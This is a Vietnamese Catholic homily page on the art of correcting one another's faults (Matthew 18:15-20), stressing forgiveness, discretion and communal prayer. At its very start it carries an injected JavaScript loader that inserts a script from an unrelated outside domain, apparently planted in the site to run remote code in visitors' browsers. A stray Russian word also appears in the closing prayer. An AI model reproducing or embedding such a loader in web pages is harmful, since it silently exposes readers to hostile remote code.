;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nghệ Thuật Sửa Lỗi – Xitô PS

Nghệ Thuật Sửa Lỗi

Thứ Tư. Ed 9,1-7; 10,18-22 ; Mt 18,15-20 (CN XIX TN, Năm A)

Chúng ta được Chúa mời gọi sống chung trong một Cộng đoàn Giáo Hội, một gia đình mới, mọi người đều là anh chị em với nhau, đều có trách nhiệm về nhau. Muốn có một đời sống Cộng đoàn đích thực nghĩa là một Cộng đoàn đầy yêu thương, bác ái và phục vụ, không thể chỉ dựa trên những khao khát và nỗ lực với sức riêng của mỗi người mà còn cần tới sự giúp đỡ người anh chị em mình và cần có ơn Chúa trợ giúp. Tự bản chất chúng ta đều là mang nơi mình thân phận yếu đuối, mong manh dễ vỡ, ai cũng có thể lỗi lầm. Đức Thánh Cha Phanxico từng nói: “chúng ta đều là tội nhân”. Nhưng nhiều lúc vì vô tình, cũng có thể vì tính kiêu căng làm chúng ta không nhận ra lỗi lầm của mình. Đã bao lần chúng ta xúc phạm tới Chúa, biết bao lần chúng ta lỗi phạm với anh chị em mình nhưng lại không ăn năn hối cải. Bởi thế Tin Mừng hôm nay nhấn mạnh tới ơn tha thứ và việc sửa lỗi nhau. Ơn tha thứ của Chúa thể hiện cách vô biên, Ngài luôn sẵn sàng để tha thứ. Tin Mừng hôm nay Chúa cũng mời gọi chúng ta hãy biết tha thứ, biết cảm thông và biết sửa lỗi cho nhau với tình yêu thương bác ái. Trong cuộc sống nhiều lúc chúng ta thay vì yêu thương sửa lỗi cho nhau chúng ta lại lên án, thay vì cảm thông chúng ta lại rỉ tai nhau những sai lỗi của người khác. Tiêu chuẩn sửa lỗi của Chúa Giêsu đưa ra nhằm giúp cho chúng ta thăng tiến trong cái nhìn bao dung của Chúa. Chúa kêu mời chúng ta vì nhau mà sửa lỗi, vì yêu thương mà sửa cho nhau. Và cần đến lời cầu xin để được tha thứ, cần tới Chúa để chúng ta nghĩ về nhau.

Nhắc nhở, sửa lỗi nhau là cả một nghệ thuật, đòi người sửa dạy phải khéo léo thực hiện. Tin Mừng hôm nay dạy chúng ta nghệ thuật sửa lỗi anh (chị) em mình, đó là biết tôn trọng và giữ thể diện cho người khác. Để sửa lỗi cần có sự kiên nhẫn, kín đáo và tế nhị. Khi thấy người anh (chị) em mình sai lỗi nhất là những lỗi công khai gây gương mù gương xấu nặng nề, thì vì lòng bác ái Chúa bảo, hãy đi sửa lỗi. Chúa Giêsu không dạy chúng ta im lặng khi thấy anh (chị) em mình sai lỗi bởi khi ấy “im lặng là đồng lõa”! Khi thấy một người có nguy cơ bị rơi xuống vực, trách nhiệm của người thấy là lên tiếng cảnh báo. Khi sửa lỗi người khác thì phải chân nhận rằng đó là người anh (chị) em chứ không phải kẻ thù, là người dưng nước lã. Lời khuyên, sự nâng đỡ, nhắc nhở riêng tư phải là bước đầu tiên; kế đến mới cần tới những người có trách nhiệm và bước cuối cùng mới là phán xét của Cộng đoàn cùng sự phó thác vào lòng nhân từ của Chúa. Điều quan trọng là tình yêu thương bác ái trong cách sửa lỗi anh (chị) em. Có một điều không thể thiếu là ơn Chúa, là lời cầu nguyện, xin Chúa ban ơn cho người anh (chị) em. Hôm nay Chúa còn cho biết, lời nguyện chung mang tới sức mạnh khôn lường: “Nếu ở dưới dất, hai người trong anh em hợp lời cầu xin bất cứ điều gì, thì Cha Thầy, Đấng ngự trên trời, sẽ ban cho”.

Thiên Chúa cũng chỉ chờ cho chúng ta tha thứ cho nhau để Ngài cũng xóa bỏ mọi lỗi lầm của chúng ta: “Dưới đất, anh em cầm buộc những điều gì, trên trời cũng cầm buộc như vậy; dưới đất, anh em tháo cởi những điều gì, trên trời cũng tháo cởi như vậy.”

Chúng ta cùng cầu xin Chúa giải thoát chúng ta khỏi tội lỗi mà sức riêng chúng ta không thoát được. Nguyện xin Chúa luôn hiện diện nối kết chúng ta sống hiệp thông với nhau trong tình yêu thương, яндекс chỉ dạy nhau trong tình bác ái bao dung.

Duy Khiên O.Cist

 

You May Also Like

Trả lời

X